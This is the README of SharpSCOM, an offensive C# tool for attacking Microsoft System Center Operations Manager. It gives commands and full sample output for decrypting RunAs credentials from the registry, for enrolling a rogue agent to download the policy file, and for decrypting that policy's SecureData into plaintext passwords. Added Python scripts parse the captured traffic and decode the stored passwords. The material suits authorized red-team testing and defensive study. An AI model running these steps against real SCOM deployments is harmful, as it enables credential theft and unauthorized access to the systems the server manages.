A C# tool for interacting with Microsoft System Center Operations Manager (SCOM).
This tool has been tested against SCOM Server version 10.22.10118.0.
SSPI integration is provided via the nsspi library from Kevin Thompson (antiduh) released under the BSD-2 license.
```text
█▀ █ █ ▄▀█ █▀█ █▀█ █▀ █▀▀ █▀█ █▀▄▀█
▄█ █▀█ █▀█ █▀▄ █▀▀ ▄█ █▄▄ █▄█ █ ▀ █
Author: Matt Johnson (@breakfix) - SpecterOps - v0.0.1

Usage: SharpSCOM <command> [options]

Commands:
  RegisterAgent        Register a new agent with SCOM server
  RegisterCertificate  Assign a certificate to an existing agent
  RequestPolicy        Request policy from SCOM server
  DownloadPolicy       Download policy from SCOM server
  AutoEnroll           Send a multi-part request consisting of RegisterAgent, RegisterCertificate and RequestPolicy and attempt to automatically download the policy
  DecryptPolicy        Decrypt SecureData section from a policy file
  DecryptRunAs         Extract and decrypt RunAs credentials from registry

Common Options:
  /hostname:<name>         Computer hostname (default: current machine)
  /managementgroup:<mg>    SCOM management group name
  /server:<server>         SCOM server address
  /port:<port>             SCOM server port (default: 5723)
  /outfile:<file>          Output file path
  /data:<base64>           Base64-encoded data
  /key:<xml>               RSA private key in XML format
  /verbose                 Enable verbose output
  /help                    Show this help message

Examples:
  SharpSCOM AutoEnroll /managementgroup:MG1 /server:scom.domain.com
  SharpSCOM DecryptPolicy /data:<base64> /outfile:policy.xml
  SharpSCOM DecryptRunAs
```
The following commands are intended to be run on a server which is currently enrolled with SCOM. In the event RunAs credentials are in use and have been distributed to the server, we can use the below commands to recover plaintext credentials.
Extract and decrypt RunAs credentials from the registry (requires local admin privileges):
```text
SharpSCOM.exe decryptrunas

█▀ █ █ ▄▀█ █▀█ █▀█ █▀ █▀▀ █▀█ █▀▄▀█
▄█ █▀█ █▀█ █▀▄ █▀▀ ▄█ █▄▄ █▄█ █ ▀ █
Author: Matt Johnson (@breakfix) - SpecterOps - v0.0.1

[+] Searching for RunAs credentials in registry...
[+] Found 4 credentials

Username: ludus\opsmgr_action
Password: Password123

Username: ludus\opsmgr_dataread
Password: Password123

Username: ludus\opsmgr_datawrite
Password: Password123

Username: ludus\runas_account
Password: SuperSecure!

[+] Completed
```
Extract and decrypt RunAs credentials stored inside the SecureData section of an agent policy XML file. By default this file can be found at `C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\Connector Configuration Cache\$MANAGEMENT_GROUP_NAME$\OpsMgrConnector.Config`.

This command locates the current SCOM RunAs certificate in the `Local Machine\Microsoft Monitoring Agent` store and uses the associated private key for decryption.
```text
SharpSCOM DecryptPolicy /data:<base64-encrypted-data>

█▀ █ █ ▄▀█ █▀█ █▀█ █▀ █▀▀ █▀█ █▀▄▀█
▄█ █▀█ █▀█ █▀▄ █▀▀ ▄█ █▄▄ █▄█ █ ▀ █
Author: Matt Johnson (@breakfix) - SpecterOps - v0.0.1

[+] Attempting to decrypt policy data...
[+] Using certificate from store
[+] Found certificate in Microsoft Monitoring Agent store
[+] Subject: O=Microsoft, OU=RunAs Account Encryption, CN=scom-db.ludus.domain
[+] Issuer: O=Microsoft, OU=RunAs Account Encryption, CN=scom-db.ludus.domain
[+] Thumbprint: 88D3E2AC575795E5F5F0E0C2EAFFB5FC386EA52F
[+] Key Size: 2048
[+] RSA key loaded successfully from certificate
[+] SecureData decrypted successfully!

<SecureStorageContainer><SecureStorageReferences><Added><SecureStorageReference Identity="63745834-3e54-936c-1b47-2d632054a177"><TargetSSID>01020202020202020202020202020202020202020200000000000000000000000000000000000000</TargetSSID></SecureStorageReference></Added><Removed /><Modified /></SecureStorageReferences><SecureStorageElements><Added><SecureStorageElement Type="WindowsCredential"><SSID>00C29753F0583B2A1D9D0D81DF24F0FBA31D72B17A00000000000000000000000000000000000000</SSID><Domain>ludus</Domain><UserName>runas_account</UserName><Password>UwB1AHAAZQByAFMAZQBjAHUAcgBlACEA</Password></SecureStorageElement><SecureStorageElement Type="ActionAccountCredential"><SSID>01020202020202020202020202020202020202020200000000000000000000000000000000000000</SSID><Domain>NT Authority</Domain><UserName>LocalSystem</UserName></SecureStorageElement></Added><Removed /><Modified /></SecureStorageElements></SecureStorageContainer>
```
If we have control of a domain-joined host that is not currently enrolled with SCOM, we can attempt to enroll the device and request an agent policy XML file, provided the requirements below are met.
Requirements:
- Kerberos authentication as computer account
- Auto enrollment enabled
To enroll a new device, the SCOM agent will send each of the 4 messages below to the SCOM server.
| Command | Description |
|---|---|
| RegisterAgent | Register a new agent with SCOM server |
| RegisterCertificate | Assign a certificate to an existing agent |
| RequestPolicy | Request policy from SCOM server |
| DownloadPolicy | Download policy from SCOM server |
For testing purposes, each of the messages above can be sent individually to the SCOM server using the corresponding command in SharpSCOM.
Note: The SCOM server expects to receive these messages together as part of a multi-message request. In order to reliably receive the agent policy file, we must use the `AutoEnroll` command, which sends the `RegisterAgent`, `RegisterCertificate` and `RequestPolicy` commands together as a multi-part message.
After sending the AutoEnroll command, the response from the SCOM server will be automatically parsed and used to generate the final DownloadPolicy message to download the agent policy XML file.
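As an added example (not part of SharpSCOM or its author's code), the Python below decodes the two wrap tokens that the verbose AutoEnroll log further down prints in base64: the server's reply to the multi-part message and the agent's follow-up DownloadPolicy request. The 16-byte framing it checks (a 4-byte marker, two 2-byte fields, a little-endian decompressed length, a little-endian zlib-compressed length, then the zlib stream) is inferred from those two captures alone and is an assumption, not a documented SCOM structure, so the script rejects any token whose declared lengths disagree with its contents rather than guessing. Reading a capture this way is what a defender reviewing agent traffic on port 5723 needs: the decompressed reply carries the policy file name as a length-prefixed UTF-16LE string and ends with the same policy GUID the tool logs as `policy_guid`. The helper names are my own.

```python
import base64
import re
import struct
import zlib
from typing import Optional

# Wrap tokens copied verbatim from the verbose AutoEnroll log in this README:
# the server's reply to the multi-part registration message (225 bytes on the wire)
# and the agent's DownloadPolicy request (148 bytes on the wire).
SERVER_REPLY_B64 = "AyBzGQQgBCD+AAAA0QAAAHicm+eqwsHEwMDxjoGBgRmInXz9fdkZGRgMU+ZOiYjOWtL8f0tTQMJz9pOB3j12jrKrVm3W2Gnw/8VfT6A6DqB6oF4G8RQGBnT5tLktKprvj1zz/2hXvvhxVYi32x2gqQwMp1v5QBRDE1SvBTOYy3A2HkIDzRIA0YwMGkAyjcGUwYjBmMGSIQUIzRl0GVIZkoBiIJYJkG3BkAxkWQDFjBgMgSxjICsJKJsKps0YEoEiyUCVegwVDLkMOQyPTyi9SCl/4Nd7NF7jsMvBEgDLhkBP"
AGENT_DOWNLOAD_REQUEST_B64 = "AyBzGQQgBCCoAAAAhAAAAHicm+eqwsHMwMAwA4hBtJOvvy87IwODYcrcKRHRWUua/29pCkh4zp42t0VF8/2Ra/4f7coXP64K8QSq44TqEU9hYECXPxno3WPnKLtq1WaNnQb/X/x1crsDNJWBgZUBAnSA2IIZwmZkQAVn4xkYHp9QepFS/sCv92i8xmGXgyUA73oyHQ=="

# Framing as inferred from these two captures only (an assumption, not a documented
# SCOM layout): 4-byte marker, two 2-byte fields, little-endian decompressed length,
# little-endian zlib-compressed length, then a zlib stream of exactly that length.
HEADER = struct.Struct("<4sHHII")
EXPECTED_MARKER = bytes.fromhex("03207319")

# A GUID-named .xml file name encoded as UTF-16LE, as seen in the decompressed reply.
UTF16_XML_NAME = re.compile(rb"(?:[0-9a-fA-F-]\x00){36}\.\x00x\x00m\x00l\x00")


def parse_wrap_token(token_b64: str) -> dict:
    """Split a wrap token into header fields and the decompressed payload.

    Raises ValueError when the framing does not match the inferred layout, so a
    token whose declared lengths disagree with its bytes is rejected, not guessed at.
    """
    raw = base64.b64decode(token_b64, validate=True)
    marker, field1, field2, plain_len, comp_len = HEADER.unpack_from(raw, 0)
    if marker != EXPECTED_MARKER:
        raise ValueError(f"unexpected marker {marker.hex()}")
    body = raw[HEADER.size:]
    if len(body) != comp_len:
        raise ValueError(f"header says {comp_len} compressed bytes, {len(body)} present")
    payload = zlib.decompress(body)          # zlib also verifies the Adler-32 trailer
    if len(payload) != plain_len:
        raise ValueError(f"header says {plain_len} plain bytes, got {len(payload)}")
    return {
        "wire_bytes": len(raw),
        "fields": (field1, field2),
        "compressed_len": comp_len,
        "payload": payload,
    }


def policy_file_name(payload: bytes) -> Optional[str]:
    """Return the UTF-16LE policy file name embedded in a reply, or None if absent.

    The name is preceded by a little-endian character count, which is cross-checked.
    """
    m = UTF16_XML_NAME.search(payload)
    if m is None:
        return None
    name = m.group(0).decode("utf-16-le")
    count = int.from_bytes(payload[m.start() - 4:m.start()], "little")
    if count != len(name):
        raise ValueError(f"length prefix {count} != {len(name)} characters")
    return name


def trailing_guid(payload: bytes) -> str:
    """Hex of the payload's last 16 bytes, in the dashed form the tool logs."""
    return "-".join(f"{b:02X}" for b in payload[-16:])


if __name__ == "__main__":
    for label, token in (("server reply", SERVER_REPLY_B64),
                         ("agent DownloadPolicy request", AGENT_DOWNLOAD_REQUEST_B64)):
        info = parse_wrap_token(token)
        print(f"{label}: {info['wire_bytes']} bytes on the wire, "
              f"{info['compressed_len']} compressed, {len(info['payload'])} decompressed")
        print("  policy file name:", policy_file_name(info["payload"]))
        print("  trailing GUID:   ", trailing_guid(info["payload"]))
```

The byte counts the script derives from the headers (225 received, 148 sent) line up with the "Received 225 bytes" and "Sending 148 bytes" lines in the log, and the trailing GUID of both payloads is the logged `policy_guid`, which is how you confirm the framing guess against a new capture before trusting any field offsets.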
```text
SharpSCOM.exe autoenroll /managementgroup:SCOM1 /server:scom-om1.ludus.domain /hostname:fake1.ludus.domain /outfile:C:\Users\domainadmin\desktop\policy_new.xml

█▀ █ █ ▄▀█ █▀█ █▀█ █▀ █▀▀ █▀█ █▀▄▀█
▄█ █▀█ █▀█ █▀▄ █▀▀ ▄█ █▄▄ █▄█ █ ▀ █
Author: Matt Johnson (@breakfix) - SpecterOps - v0.0.1

[+] Using Hostname: fake1.ludus.domain (24849d66-ef29-d6c4-4ff1-3e77a3e37a54)
[+] Using Management Group: SCOM1 (f0bc91d0-6de8-1fa8-d6bd-eb98f66672ad)
[+] Server: scom-om1.ludus.domain:5723
[+] Preparing to send multi-part agent message...
[+] Connecting to scom-om1.ludus.domain:5723
[+] Performing Kerberos SSPI authentication...
[+] Authentication successful!
[+] Client authority:
[+] Client context user: LUDUS.DOMAIN\fake1$
[+] Client session key: FF-36-61-D8-3D-53-71-B4-F8-4F-AA-E5-D4-0F-FA-1B-1F-34-15-62-F7-F4-3F-11-16-15-4B-47-1F-25-8B-59
[+] Generating agent registration message
[+] Generating agent certificate message
[+] Generating new agent certificate for fake1.ludus.domain
[+] Subject: CN=fake1.ludus.domain, OU=RunAs Account Encryption, O=Microsoft
[+] Serial Number: 4718FEBFD26B45A24405206C262C1F66
[+] Valid From: 10/26/2025 2:32:48 AM UTC
[+] Valid To: 10/26/2026 2:32:48 AM UTC
[+] Thumbprint: 7AA2A863985A965AA7E42061F5D344D17B68DB23
[+] Public Key (Hex): <REDACTED FOR BREVITY>
[+] Certificate (DER Base64): <REDACTED FOR BREVITY>
[+] Private Key (XML): <RSAKeyValue><Modulus><REDACTED FOR BREVITY></D></RSAKeyValue>
[+] Generating agent policy request
[+] Sending multi-part agent message...
[+] Sending 1174 bytes to server...
[+] [AGENT >>>>>> SCOM] [ENCRYPT] plaintext wrap token (base64): <REDACTED FOR BREVITY>
[+] [AGENT >>>>>> SCOM] [ENCRYPT] zlib decompressed wrap token (base64): <REDACTED FOR BREVITY>
[+] Waiting for server response...
[+] [AGENT <<<<<<<<< SCOM] [DECRYPT] plaintext wrap token (base64): AyBzGQQgBCD+AAAA0QAAAHicm+eqwsHEwMDxjoGBgRmInXz9fdkZGRgMU+ZOiYjOWtL8f0tTQMJz9pOB3j12jrKrVm3W2Gnw/8VfT6A6DqB6oF4G8RQGBnT5tLktKprvj1zz/2hXvvhxVYi32x2gqQwMp1v5QBRDE1SvBTOYy3A2HkIDzRIA0YwMGkAyjcGUwYjBmMGSIQUIzRl0GVIZkoBiIJYJkG3BkAxkWQDFjBgMgSxjICsJKJsKps0YEoEiyUCVegwVDLkMOQyPTyi9SCl/4Nd7NF7jsMvBEgDLhkBP
[+] [AGENT <<<<<<<<< SCOM] [DECRYPT] zlib decompressed wrap token (base64): nkUkCAIAAAjuAAAAAwAAAEJNT00HAQAAMWSdlFhbaqSD/7SCUGDnB8lRS4w+QR2qqrMouTD/6P1JTU9NCAAAAAIAAAAXZAAAyVFLjD5BHaqqsyi5MP/o/WadhCQp78TWT/E+d6PjelRLRtwBAAAAAMuFDgAAAAAAggAAAAIAAAA4AwAAAAAAAM1fAAAAAAAAF2QAEAAAAAABACgAAABmADUAMgAzADkAZABkADcALQBlAGIANQA3AC0ANABlADgAYwAtADgAYgAyADEALQAzAGIAYgA3AGUAYgBiADYAYQAzAGMANAAuAHgAbQBsAOPIIuhkd+BOjcVfKMNEwXQ=
[+] Received 225 bytes from server
[+] Server registration response received
[+] Generating policy download message
[+] server_guid: C9-51-4B-8C-3E-41-1D-AA-AA-B3-28-B9-30-FF-E8-FD
[+] policy_guid: E3-C8-22-E8-64-77-E0-4E-8D-C5-5F-28-C3-44-C1-74
[+] policy_length_1: CD-5F-00-00
[+] policy_length_2: 38-03-00-00
[+] Sending 148 bytes to server...
[+] [AGENT >>>>>> SCOM] [ENCRYPT] plaintext wrap token (base64): AyBzGQQgBCCoAAAAhAAAAHicm+eqwsHMwMAwA4hBtJOvvy87IwODYcrcKRHRWUua/29pCkh4zp42t0VF8/2Ra/4f7coXP64K8QSq44TqEU9hYECXPxno3WPnKLtq1WaNnQb/X/x1crsDNJWBgZUBAnSA2IIZwmZkQAVn4xkYHp9QepFS/sCv92i8xmGXgyUA73oyHQ==
[+] [AGENT >>>>>> SCOM] [ENCRYPT] zlib decompressed wrap token (base64): nkUkCAMAAACYAAAAAwAAAEJNT00HAQAAMWSdlFhbaqSD/7SCUGDnB2adhCQp78TWT/E+d6PjelRJTU9NCQAAAAMAAAAXZAAAZp2EJCnvxNZP8T53o+N6VMlRS4w+QR2qqrMouTD/6P1CRtwBAAAAAAUAAAAAAAAALAAAADgDAAAAAAAAAQAAAAAAAAAAAAAAAAAAAM1fAADjyCLoZHfgTo3FXyjDRMF0
[+] Waiting for server response...
[+] [AGENT <<<<<<<<< SCOM] [DECRYPT] plaintext wrap token (base64): <REDACTED FOR BREVITY>
[+] [AGENT <<<<<<<<< SCOM] [DECRYPT] zlib decompressed wrap token (base64): <REDACTED FOR BREVITY>
[+] Received 8655 bytes from server
[+] Successfully wrote policy XML to C:\Users\domainadmin\desktop\policy_new.xml
[+] Completed
[+] Disconnected from server
```

After receiving the policy file, we can extract the SecureData section and use the private key associated with the agent certificate to decrypt it.
```text
SharpSCOM.exe decryptpolicy /data:"DAEAAAECAAAQZgA<REDACTED FOR BREVITY> /key:<RSAKeyValue><Modulus><REDACTED FOR BREVITY></D></RSAKeyValue>

█▀ █ █ ▄▀█ █▀█ █▀█ █▀ █▀▀ █▀█ █▀▄▀█
▄█ █▀█ █▀█ █▀▄ █▀▀ ▄█ █▄▄ █▄█ █ ▀ █
Author: Matt Johnson (@breakfix) - SpecterOps - v0.0.1

[+] Attempting to decrypt policy data...
[+] Using private key from XML
[+] Key Size: 2048
[+] RSA key loaded successfully from XML
[+] SecureData decrypted successfully!

<SecureStorageContainer><SecureStorageReferences><Added /><Removed /><Modified /></SecureStorageReferences><SecureStorageElements><Added><SecureStorageElement Type="WindowsCredential"><SSID>00C29753F0583B2A1D9D0D81DF24F0FBA31D72B17A00000000000000000000000000000000000000</SSID><Domain>ludus</Domain><UserName>runas_account</UserName><Password>UwB1AHAAZQByAFMAZQBjAHUAcgBlACEA</Password></SecureStorageElement></Added><Removed /><Modified /></SecureStorageElements></SecureStorageContainer>
```
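Both DecryptPolicy runs in this README (the one that pulls the key from the certificate store and the one that takes it from the exported XML) end with a SecureStorageContainer document. As an added example that is not part of SharpSCOM, the Python below parses that document so a defender can list which RunAs accounts a policy pushes to a host, resolve each SecureStorageReference back to the element its TargetSSID names, and confirm that the Password element is nothing more than base64 over the UTF-16LE string, which is why holding the agent's private key is enough to recover it. The sample input is the decrypted output copied from the store-based run above; the function names are my own.

```python
import base64
import xml.etree.ElementTree as ET

# Decrypted SecureData content copied from the DecryptPolicy output in this README.
# It is the sample input for this added example; the script fetches nothing itself.
DECRYPTED_SECURE_DATA = (
    '<SecureStorageContainer>'
    '<SecureStorageReferences><Added>'
    '<SecureStorageReference Identity="63745834-3e54-936c-1b47-2d632054a177">'
    '<TargetSSID>01020202020202020202020202020202020202020200000000000000000000000000000000000000</TargetSSID>'
    '</SecureStorageReference>'
    '</Added><Removed /><Modified /></SecureStorageReferences>'
    '<SecureStorageElements><Added>'
    '<SecureStorageElement Type="WindowsCredential">'
    '<SSID>00C29753F0583B2A1D9D0D81DF24F0FBA31D72B17A00000000000000000000000000000000000000</SSID>'
    '<Domain>ludus</Domain><UserName>runas_account</UserName>'
    '<Password>UwB1AHAAZQByAFMAZQBjAHUAcgBlACEA</Password>'
    '</SecureStorageElement>'
    '<SecureStorageElement Type="ActionAccountCredential">'
    '<SSID>01020202020202020202020202020202020202020200000000000000000000000000000000000000</SSID>'
    '<Domain>NT Authority</Domain><UserName>LocalSystem</UserName>'
    '</SecureStorageElement>'
    '</Added><Removed /><Modified /></SecureStorageElements>'
    '</SecureStorageContainer>'
)


def decode_password(b64: str) -> str:
    """The Password element is base64 over the UTF-16LE bytes of the secret."""
    return base64.b64decode(b64).decode("utf-16-le")


def parse_elements(xml_text: str) -> list:
    """One dict per SecureStorageElement under Added, with any password decoded."""
    root = ET.fromstring(xml_text)
    out = []
    for el in root.iterfind("./SecureStorageElements/Added/SecureStorageElement"):
        pw = el.findtext("Password")
        out.append({
            "type": el.get("Type"),
            "ssid": el.findtext("SSID"),
            "domain": el.findtext("Domain"),
            "username": el.findtext("UserName"),
            "password": decode_password(pw) if pw else None,
        })
    return out


def referenced_ssids(xml_text: str) -> set:
    """SSIDs that a SecureStorageReference binds to a target (here, the action account)."""
    root = ET.fromstring(xml_text)
    return {
        ref.findtext("TargetSSID")
        for ref in root.iterfind("./SecureStorageReferences/Added/SecureStorageReference")
    }


def audit_lines(xml_text: str) -> list:
    """Per element: who the account is and whether a recoverable secret ships with it.

    The secret itself is deliberately not echoed; the audit question is which accounts
    reach this host in recoverable form, not what their passwords are.
    """
    refs = referenced_ssids(xml_text)
    lines = []
    for e in parse_elements(xml_text):
        secret = "password recoverable" if e["password"] is not None else "no password in policy"
        bound = "referenced" if e["ssid"] in refs else "unreferenced"
        lines.append(f'{e["type"]}: {e["domain"]}\\{e["username"]} ({secret}, {bound})')
    return lines


if __name__ == "__main__":
    for line in audit_lines(DECRYPTED_SECURE_DATA):
        print(line)
```

On this sample the WindowsCredential element for `ludus\runas_account` carries a recoverable password and is not the target of any reference, while the ActionAccountCredential for `NT Authority\LocalSystem` is the referenced target and ships no secret; running the same check over every policy that has been distributed shows exactly which RunAs accounts an agent compromise would expose.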
This project is licensed under the BSD 3-Clause license - see the LICENSE file for details.
This tool is provided for educational and authorized security testing purposes only. Ensure you have proper authorisation before using this tool against any SCOM infrastructure.
Matt Johnson (@breakfix) - SpecterOps
See the accompanying blog post here https://specterops.io/blog/2025/12/10/scommand-and-conquer-attacking-system-center-operations-manager-part-2/